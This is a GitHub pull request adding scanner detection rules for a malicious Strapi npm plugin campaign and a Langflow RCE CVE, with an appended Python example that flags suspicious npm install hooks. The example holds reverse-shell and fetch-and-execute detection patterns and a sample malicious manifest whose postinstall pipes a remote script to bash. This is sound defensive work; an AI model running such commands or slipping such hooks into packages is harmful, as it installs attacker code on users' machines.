
chore(patterns): add SUP-029 Strapi npm malware + PSV-009 Langflow Agentic RCE [2026.04.06.1]#180

Merged
kurtpayne merged 1 commit into main from chore/pattern-update-20260406-0eac
Apr 6, 2026

Conversation

@kurtpayne (Owner)

Summary

Two new detection rules, IOC enrichment, and vuln DB updates for rulepack 2026.04.06.1.

New Rules

| ID | Category | Severity | Title |
|---|---|---|---|
| SUP-029 | supply_chain | critical | Malicious Strapi npm packages (Redis RCE / Credential Harvesting) |
| PSV-009 | vulnerability | critical | Langflow Agentic Assistant RCE Vulnerability (CVE-2026-33873) |

SUP-029 — Malicious Strapi npm packages

36 malicious npm packages disguised as Strapi CMS plugins were discovered in April 2026. These packages use postinstall scripts to exploit Redis and PostgreSQL, deploy reverse shells, harvest credentials, and drop persistent implants. The campaign specifically targeted a cryptocurrency payment platform (Guardarian).

Authors: umarbek1233, kekylf12, tikeqemif26, umar_bektembiev1

Sources:

PSV-009 — Langflow Agentic Assistant RCE (CVE-2026-33873)

A remote code execution flaw in Langflow Agentic Assistant allows attackers to execute LLM-generated Python code server-side, potentially leading to full system compromise. Fixed in 1.0.1.

Source: https://www.sentinelone.com/vulnerability-database/cve-2026-33873/

Other Changes

  • IOC DB: added 4 npm sock-puppet account domains from Strapi campaign
  • Vuln DB: added langflow 1.0.0 → CVE-2026-33873 (critical, fixed 1.0.1)
  • Showcases: 147_sup029_strapi_npm_malware, 148_psv009_langflow_agentic_rce
  • Tests: 4 new unit tests (all passing)

Test Results

All 116 tests pass ✅
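
The SUP-029 rule described above keys on install-time lifecycle scripts. As an added example that is not part of this PR or of the skillscan-security codebase, the following Python check flags a package.json whose preinstall/install/postinstall hooks match fetch-and-execute, inline eval, base64-payload, Redis/PostgreSQL-client or reverse-shell patterns, or whose npm publisher is one of the four accounts listed in the description. The two sample manifests, the regex heuristics, the rule names and the verdict thresholds are constructed for this example; the package names and the host in the sample command are placeholders.

```python
"""Added example, not code from the skillscan-security project: flag an npm
manifest whose install-time lifecycle scripts look like the SUP-029 campaign
(fetch-and-execute, inline eval, base64 payloads, Redis/PostgreSQL clients,
reverse shells), or whose publisher is one of the accounts named in the PR."""
import re
from typing import Optional

# Publisher accounts listed in the PR description for the Strapi campaign.
FLAGGED_PUBLISHERS = {"umarbek1233", "kekylf12", "tikeqemif26", "umar_bektembiev1"}

# Hooks npm runs automatically when a dependency is installed.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")

# Heuristic patterns constructed for this example; not the project's signatures.
SUSPICIOUS = [
    ("remote_fetch_exec", re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sh|bash|node)\b")),
    ("inline_eval", re.compile(r"\bnode\s+-e\b|\beval\(")),
    ("base64_payload", re.compile(r"base64\s+(-d|--decode)\b|Buffer\.from\([^)]*['\"]base64['\"]")),
    ("datastore_client", re.compile(r"\b(redis-cli|psql)\b|:6379\b|:5432\b")),
    ("reverse_shell", re.compile(r"/dev/tcp/|\bnc\b.*\s-e\s|\bbash\s+-i\b")),
]

# Rules whose presence alone warrants a critical verdict (example thresholds).
CRITICAL_RULES = {"flagged_publisher", "remote_fetch_exec", "reverse_shell"}


def scan_manifest(manifest: dict, publisher: Optional[str] = None) -> list:
    """Return one finding dict per (hook, rule) hit, plus a publisher hit if any.

    `manifest` is a parsed package.json; `publisher` is the npm account that
    published the version (taken from registry metadata, not the manifest).
    """
    name = manifest.get("name", "<unknown>")
    findings = []
    if publisher in FLAGGED_PUBLISHERS:
        findings.append({"package": name, "rule": "flagged_publisher",
                         "hook": None, "detail": publisher})
    scripts = manifest.get("scripts") or {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        for rule, pattern in SUSPICIOUS:
            if pattern.search(cmd):
                findings.append({"package": name, "rule": rule,
                                 "hook": hook, "detail": cmd})
    return findings


def verdict(findings: list) -> str:
    """Collapse a finding list to clean / suspicious / critical."""
    rules = {f["rule"] for f in findings}
    if rules & CRITICAL_RULES:
        return "critical"
    return "suspicious" if rules else "clean"


# Constructed sample manifests; names and the host are placeholders.
BENIGN_MANIFEST = {
    "name": "strapi-plugin-example-sitemap",
    "version": "1.2.3",
    "scripts": {"build": "tsc -p tsconfig.json",
                "postinstall": "node ./scripts/check-node-version.js"},
}
MALICIOUS_MANIFEST = {
    "name": "strapi-plugin-example-cache",
    "version": "0.0.1",
    "scripts": {
        "preinstall": "redis-cli -h 127.0.0.1 -p 6379 CONFIG GET dir",
        "postinstall": "node -e \"require('child_process').exec("
                       "'curl -s http://example.invalid/p.sh | bash')\"",
    },
}

if __name__ == "__main__":
    for manifest, publisher in ((BENIGN_MANIFEST, "some-maintainer"),
                                (MALICIOUS_MANIFEST, "kekylf12")):
        found = scan_manifest(manifest, publisher)
        print(manifest["name"], verdict(found))
        for f in found:
            print("  ", f["rule"], f["hook"], "->", f["detail"])
```

The publisher is not in package.json; the caller supplies it from the npm registry's per-version metadata (the `_npmUser.name` field). Script-pattern rules like these are heuristics and will miss an obfuscated payload, so the blunt control for the whole class is to run dependency installs in CI with `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) and allow-list the few packages that genuinely need a build hook.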

@kurtpayne kurtpayne enabled auto-merge (squash) April 6, 2026 23:10
@kurtpayne kurtpayne force-pushed the chore/pattern-update-20260406-0eac branch from f534244 to 3cb73b0 on April 6, 2026 23:12
…entic RCE [2026.04.06.1]

- SUP-029 (critical): 36 malicious npm packages disguised as Strapi CMS plugins
  deploying Redis RCE, credential harvesting, and persistent C2 implants via
  postinstall scripts. Authors: umarbek1233, kekylf12, tikeqemif26, umar_bektembiev1.
  Ref: https://thehackernews.com/2026/04/36-malicious-npm-packages-exploited.html

- PSV-009 (critical): Langflow Agentic Assistant RCE (CVE-2026-33873) — server-side
  execution of LLM-generated Python code, potentially leading to full system compromise.

- IOC DB: added 4 npm sock-puppet account domains from Strapi campaign
- Vuln DB: added langflow 1.0.0 → CVE-2026-33873 (critical, fixed 1.0.1)
- Showcases: 147_sup029_strapi_npm_malware, 148_psv009_langflow_agentic_rce
- Tests: test_sup029_strapi_npm_malware, test_psv009_langflow_agentic_rce (4 new tests)
@kurtpayne kurtpayne force-pushed the chore/pattern-update-20260406-0eac branch from 3cb73b0 to ba22ded on April 6, 2026 23:14
@kurtpayne kurtpayne merged commit 0037be1 into main Apr 6, 2026
15 checks passed

codecov bot commented Apr 6, 2026

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 77.14%. Comparing base (e269b34) to head (ba22ded).
⚠️ Report is 1 commits behind head on main.

Additional details and impacted files
@@           Coverage Diff           @@
##             main     #180   +/-   ##
=======================================
  Coverage   77.14%   77.14%           
=======================================
  Files          30       30           
  Lines        4095     4095           
=======================================
  Hits         3159     3159           
  Misses        936      936           


@kurtpayne kurtpayne deleted the chore/pattern-update-20260406-0eac branch April 6, 2026 23:23
kurtpayne added a commit to kurtpayne/skillscan-website that referenced this pull request Apr 6, 2026
- Add SUP-029: Malicious Strapi npm packages (Redis RCE / Credential Harvesting)
- Add PSV-009: Langflow Agentic Assistant RCE Vulnerability (CVE-2026-33873)
- Update SUP count: 28 → 29
- Update PSV count: 8 → 9
- Update ruleCount: 175 → 177
- Update rulepack version: 2026.04.05.1 → 2026.04.06.1

Paired with: kurtpayne/skillscan-security#180
kurtpayne added a commit to kurtpayne/skillscan-website that referenced this pull request Apr 6, 2026
- Add SUP-029: Malicious Strapi npm packages (Redis RCE / Credential Harvesting)
- Add PSV-009: Langflow Agentic Assistant RCE Vulnerability (CVE-2026-33873)
- Update SUP count: 28 → 29
- Update PSV count: 8 → 9
- Update ruleCount: 175 → 177
- Update rulepack version: 2026.04.05.1 → 2026.04.06.1

Paired with: kurtpayne/skillscan-security#180

Co-authored-by: kurtpayne <1012635+kurtpayne@users.noreply.github.com>